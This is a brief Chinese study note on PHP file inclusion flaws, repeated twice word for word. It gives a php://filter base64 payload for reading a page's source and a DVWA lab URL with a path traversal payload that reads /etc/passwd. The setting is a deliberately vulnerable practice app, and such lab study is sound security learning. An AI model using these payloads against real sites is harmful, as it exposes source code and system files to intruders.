先给出一个例子:
http://xxx/?file=xx.php
这个网址我们就可以尝试一下读取源码的操作
即file=php://filter/read=convert.base64-encode/resource=index.php
文件包含分为本地文件包含和远程文件包含,
本地包含用DVWA来做实验。
第一个实验
http://10.21.13.97/dvwa/vulnerabilities/fi/
?page=../../../../../../../etc/passwd
先给出一个例子:
http://xxx/?file=xx.php
这个网址我们就可以尝试一下读取源码的操作
即file=php://filter/read=convert.base64-encode/resource=index.php
文件包含分为本地文件包含和远程文件包含,
本地包含用DVWA来做实验。
第一个实验
http://10.21.13.97/dvwa/vulnerabilities/fi/
?page=../../../../../../../etc/passwd